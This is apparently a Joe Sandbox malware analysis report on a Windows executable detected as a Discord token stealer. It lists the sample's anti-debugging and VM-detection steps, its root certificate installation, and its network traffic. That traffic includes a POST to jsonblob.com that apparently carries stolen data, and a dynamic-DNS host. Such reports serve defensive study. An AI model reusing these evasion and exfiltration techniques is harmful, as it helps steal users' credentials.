Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CFuejz2dRu.exe

Overview

General Information

Sample name:CFuejz2dRu.exe
renamed because original name is a hash value
Original sample name:5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f.exe
Analysis ID:1548554
MD5:020b08da71b11949586b7a6185877b13
SHA1:518117166ae0bab4b79d483e8de9c11e6b38ff50
SHA256:5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f
Tags:exeuser-adrian__luca
Infos:

Detection

Discord Token Stealer
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Discord Token Stealer
AI detected suspicious sample
Found Tor onion address
Installs new ROOT certificates
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • CFuejz2dRu.exe (PID: 5460 cmdline: "C:\Users\user\Desktop\CFuejz2dRu.exe" MD5: 020B08DA71B11949586B7A6185877B13)
    • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2768 cmdline: powershell -command [Diagnostics.Debugger]::IsAttached MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
    Process Memory Space: CFuejz2dRu.exe PID: 5460JoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [Diagnostics.Debugger]::IsAttached, CommandLine: powershell -command [Diagnostics.Debugger]::IsAttached, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFuejz2dRu.exe", ParentImage: C:\Users\user\Desktop\CFuejz2dRu.exe, ParentProcessId: 5460, ParentProcessName: CFuejz2dRu.exe, ProcessCommandLine: powershell -command [Diagnostics.Debugger]::IsAttached, ProcessId: 2768, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-04T16:24:57.739368+010020229301A Network Trojan was detected20.109.210.53443192.168.2.862044TCP
      2024-11-04T16:25:35.948910+010020229301A Network Trojan was detected20.109.210.53443192.168.2.862049TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: CFuejz2dRu.exeReversingLabs: Detection: 36%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
      Source: CFuejz2dRu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Source: CFuejz2dRu.exe, 00000000.00000000.1466821747.0000000000E82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: m=nil base numberstringStringFormat[]byteCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wuint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondServernetdnsdomaingophertelnetreturn.locallisten.onionip+netsocket390625GetACPhangupkilledrdtscppopcntcmd/go FROM GetAcesendtoempty rune1 secretheaderAnswerLengthSTREETavx512rdrandrdseedAPPDATADiscordOrbitumSputnikVivaldiChrome1Chrome2Chrome3Chrome4Chrome5Iridium.configdiscordFlatPakfirefoxFirefoxstorageleveldbTriggerUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTreaddirconsolePATHEXTforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
      Source: CFuejz2dRu.exeString found in binary or memory: m=nil base numberstringStringFormat[]byteCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiX25519%w%.0wuint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondServernetdnsdomaingophertelnetreturn.locallisten.onionip+netsocket390625GetACPhangupkilledrdtscppopcntcmd/go FROM GetAcesendtoempty rune1 secretheaderAnswerLengthSTREETavx512rdrandrdseedAPPDATADiscordOrbitumSputnikVivaldiChrome1Chrome2Chrome3Chrome4Chrome5Iridium.configdiscordFlatPakfirefoxFirefoxstorageleveldbTriggerUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTreaddirconsolePATHEXTforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
      Source: unknownDNS query: name: goatherd.ddns.net
      Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:62044
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:62049
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownTCP traffic detected without corresponding DNS query: 86.237.153.121
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/mac_list.txt HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
      Source: global trafficDNS traffic detected: DNS query: jsonblob.com
      Source: global trafficDNS traffic detected: DNS query: discord.com
      Source: global trafficDNS traffic detected: DNS query: goatherd.ddns.net
      Source: unknownHTTP traffic detected: POST /api/jsonBlob HTTP/1.1Host: jsonblob.comUser-Agent: Go-http-client/1.1Content-Length: 4135Accept: application/jsonContent-Type: application/jsonAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 04 Nov 2024 15:24:48 GMTContent-Type: text/htmlContent-Length: 151Connection: closeCF-RAY: 8dd59cf1cf69e82f-DFW
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 04 Nov 2024 15:24:49 GMTContent-Type: text/htmlContent-Length: 151Connection: closeCF-RAY: 8dd59cf82b112c9c-DFW
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/fJedmL2peto.crl
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/fJedmL2peto.crl0
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crlCertCreateCertificateContextCertFreeCertificat
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crtGlobalSign
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Rk8
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C000262000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Rk80%
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Rk8http://i.pki.goog/we1.crt
      Source: CFuejz2dRu.exe, 00000000.00000002.1591335139.000000C0000E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jsonblob.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 62043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62043
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@4/3@5/5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3hkxvbv.cjm.ps1Jump to behavior
      Source: CFuejz2dRu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM Win32_Processor
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: CFuejz2dRu.exeReversingLabs: Detection: 36%
      Source: CFuejz2dRu.exeString found in binary or memory: failed to construct HKDF label: %sreflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangereflect.Value.Grow: slice overflow: day-of-year does not match month3552713678800500929355621337890625too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizecrypto/md5: invalid hash state sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharereflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9mime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlinecan't get IEnumVARIANT, enum is nilSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser
      Source: CFuejz2dRu.exeString found in binary or memory: failed to construct HKDF label: %sreflect: Field of non-struct type reflect: Field index out of boundsreflect: string index out of rangereflect.Value.Grow: slice overflow: day-of-year does not match month3552713678800500929355621337890625too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizecrypto/md5: invalid hash state sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharereflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9mime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlinecan't get IEnumVARIANT, enum is nilSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthtoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser
      Source: CFuejz2dRu.exeString found in binary or memory: /usr/lib/go/src/net/addrselect.go
      Source: unknownProcess created: C:\Users\user\Desktop\CFuejz2dRu.exe "C:\Users\user\Desktop\CFuejz2dRu.exe"
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [Diagnostics.Debugger]::IsAttached
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [Diagnostics.Debugger]::IsAttachedJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: CFuejz2dRu.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: CFuejz2dRu.exeStatic file information: File size 6226432 > 1048576
      Source: CFuejz2dRu.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c0e00
      Source: CFuejz2dRu.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2c4e00
      Source: CFuejz2dRu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: CFuejz2dRu.exeStatic PE information: section name: .xdata
      Source: CFuejz2dRu.exeStatic PE information: section name: .symtab

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CFuejz2dRu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
